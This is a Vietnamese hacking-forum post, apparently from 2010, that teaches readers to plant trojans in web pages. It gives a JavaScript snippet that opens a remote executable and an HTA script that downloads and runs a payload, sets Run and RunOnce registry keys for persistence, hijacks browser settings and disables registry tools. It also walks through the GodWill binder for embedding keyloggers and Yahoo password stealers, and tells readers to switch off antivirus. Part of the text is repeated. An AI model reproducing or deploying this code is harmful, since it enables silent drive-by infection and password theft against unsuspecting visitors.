Tấn công máy chủ phòng net từ xa
Trang 1 trong tổng số 1 trang
Tấn công máy chủ phòng net từ xa
admin 5/4/2010, 3:53 pm
Khi các bạn đã sử dụng thành công nhưng do 1 phút sơ sảy mà bị Công An bắt thì chỉ mong các anh đừng réo và khai tên em ra kẻo tội nghiệp
Cách 1 : dùng một đoạn mã đơn giản để open 1 con trojan !
đoạn mã như sau:
cách thứ 2 là cách rất cao cấp ...
bạn copy vào notepad đoạn mã sau:
nhớ là thay đường dẫn của con trojan đi nha..(http://www.freewebs.com/hinhanhlop18/hackervn.exe) là đường dăn tơi kon TJ
sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
cách này rất hay...và cao cấp.
cách thứ 3
là các bạn dùng chương trình gắn trojan vào html: đó là GodWill1.06
chương trình này mình thấy nói rất nhiều trên các diễn đàn nhưng mà chẳng có ai làm được cả...hình như là copy ở site ra thôi.
các bạn downlaod tại đây http://www.freewebs.com/trangchulop18/GodWill1.6.rar (http://www.esnips.com/doc/ffe5986f-729e-4699-a5e4-bd4efc19b7b4/GodWill1.6)...nếu không down được thì các bạn lên google tìm nha.file kimdung upload lên gồm cả file hỗ trợ nữa nên nó khoảng 1.3Mb. nào bạn hãy tắt các trương trình diệt virus đi dể chúng ta setup
sau khi down về giải nén sẽ có các file sau như hình sau:
nhấn kép vào file GODWILL sẽ có hình sau:
sau khi bạn đọc xong những điều khoản thì nhấn enter.
rồi đến đây bắt đầu xuất hiện những tiện ích của con trojan này.
cái chúng ta quan tâm ở đây là html ! ok nhấn vào chữ HTML:
đến đây các bạn nhấn: Genral Options để chúng ta bắt đầu tạo
vì đặc điểm của con này là nó chỉ cho gắn một con trojan khoảng 34Kb thôi nên chúng ta tìm những con trojan nào dưới 34Kb như con MYSPY hay con K2PS hay con hackpass mới nhất đó yjaked1
+ ở mục enter .exe fie bạn mở con trojan đã chuẩn bị trước ra (MYSPY hay con K2PS,yjaked1...)
chọn đường dẫn tới nó.
+ ở mục enter.html bạn chọn đường dẫn cho trang web mình cần gắn trojan.
+ không nhắp chọn Uer defult page
+ ở mục enter.output bạn đổi tên file Geebferh.html thành tên nào bạn muốn.vì sau khi tạo xong thì trang web có gắn trojan sẽ là tên đó ( bạn không được mở trang đó ra)
+ page ICQ notyfi bạn muốn nhấp chọn cũng được nếu bạn có số ICQ thì nhấn chọn để mỗi khi có người open trang web nó sẽ báo về ICQ cho bạn...như kimdung thì chọn hết ngoại trừ "Uer defult page"
rồi xong sau khi đã hoàn thành các bước giờ thì bạn nhấn DOVE được rồi.
rồi nhấn GEN để hoàn thành ...Godwill sẽ gắn con trojan của bạn vào trang web của bạn
và nó sẽ tự hoạt động mỗi khi có người mở trang web đó ra.
trojan k2sp là keylogger.
MYSPY là một loại gián điệp
yjaked1 dùng để hack pass yahoo.
Cách 1 : dùng một đoạn mã đơn giản để open 1 con trojan !
đoạn mã như sau:
- Code:
<script language=javascript>
open("http://freewebs.com/nhutuanweb/thanks.exe");
</script>
cách thứ 2 là cách rất cao cấp ...
bạn copy vào notepad đoạn mã sau:
- Code:
<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("scripting.FileSystemObject");
var Shell = new ActiveXObject("Wscript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var burl = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var fso = new ActiveXObject("scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("Wscript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\RunOnce\\\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Run\\\\System32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url2","http://http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url3","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url4","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url5","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url6","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url7","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url8","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url9","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url10","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url11","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Calendar\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Games\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Launchcast\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG R_Weather\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"REG_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren tVersion\\\\Policies\\\\System\\\\DisableRegistryT ools",1,"REG_DWORD");');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
<!--- <frameset></frameset> -->
nhớ là thay đường dẫn của con trojan đi nha..(http://www.freewebs.com/hinhanhlop18/hackervn.exe) là đường dăn tơi kon TJ
sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
- Code:
<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="hackervn.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>
cách này rất hay...và cao cấp.
cách thứ 3
là các bạn dùng chương trình gắn trojan vào html: đó là GodWill1.06
chương trình này mình thấy nói rất nhiều trên các diễn đàn nhưng mà chẳng có ai làm được cả...hình như là copy ở site ra thôi.
các bạn downlaod tại đây http://www.freewebs.com/trangchulop18/GodWill1.6.rar (http://www.esnips.com/doc/ffe5986f-729e-4699-a5e4-bd4efc19b7b4/GodWill1.6)...nếu không down được thì các bạn lên google tìm nha.file kimdung upload lên gồm cả file hỗ trợ nữa nên nó khoảng 1.3Mb. nào bạn hãy tắt các trương trình diệt virus đi dể chúng ta setup
sau khi down về giải nén sẽ có các file sau như hình sau:
nhấn kép vào file GODWILL sẽ có hình sau:
sau khi bạn đọc xong những điều khoản thì nhấn enter.
rồi đến đây bắt đầu xuất hiện những tiện ích của con trojan này.
cái chúng ta quan tâm ở đây là html ! ok nhấn vào chữ HTML:
đến đây các bạn nhấn: Genral Options để chúng ta bắt đầu tạo
vì đặc điểm của con này là nó chỉ cho gắn một con trojan khoảng 34Kb thôi nên chúng ta tìm những con trojan nào dưới 34Kb như con MYSPY hay con K2PS hay con hackpass mới nhất đó yjaked1
+ ở mục enter .exe fie bạn mở con trojan đã chuẩn bị trước ra (MYSPY hay con K2PS,yjaked1...)
chọn đường dẫn tới nó.
+ ở mục enter.html bạn chọn đường dẫn cho trang web mình cần gắn trojan.
+ không nhắp chọn Uer defult page
+ ở mục enter.output bạn đổi tên file Geebferh.html thành tên nào bạn muốn.vì sau khi tạo xong thì trang web có gắn trojan sẽ là tên đó ( bạn không được mở trang đó ra)
+ page ICQ notyfi bạn muốn nhấp chọn cũng được nếu bạn có số ICQ thì nhấn chọn để mỗi khi có người open trang web nó sẽ báo về ICQ cho bạn...như kimdung thì chọn hết ngoại trừ "Uer defult page"
rồi xong sau khi đã hoàn thành các bước giờ thì bạn nhấn DOVE được rồi.
rồi nhấn GEN để hoàn thành ...Godwill sẽ gắn con trojan của bạn vào trang web của bạn
và nó sẽ tự hoạt động mỗi khi có người mở trang web đó ra.
trojan k2sp là keylogger.
MYSPY là một loại gián điệp
yjaked1 dùng để hack pass yahoo.
admin- Thiếu Úy III
- Tổng số bài gửi : 627
Diem : 6553
Thank : 4
Join date : 24/03/2010
Đến từ : Bỉm Sơn - Thanh hóa -
Similar topics» Nguyên lý tấn công ARP poisoning và cách phòng thủ
» Nguyên lý tấn công ARP poisoning và cách phòng thủ
» Tấn công kiểu SQL Injection và các phòng chống trong ASP.NET
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
» Những phương thức lây lan của malware và cách phòng chống
» Nguyên lý tấn công ARP poisoning và cách phòng thủ
» Tấn công kiểu SQL Injection và các phòng chống trong ASP.NET
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
» Những phương thức lây lan của malware và cách phòng chống
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
» xin tai lieu tieng viet
» Theo dõi tiến trình
» Giải pháp Bảo mật của Cisco
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
» Learn to hack !
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
» Ô Long Viên (Tập II)
» những ebook về hack tiếng việt cho người mới tìm hiểu.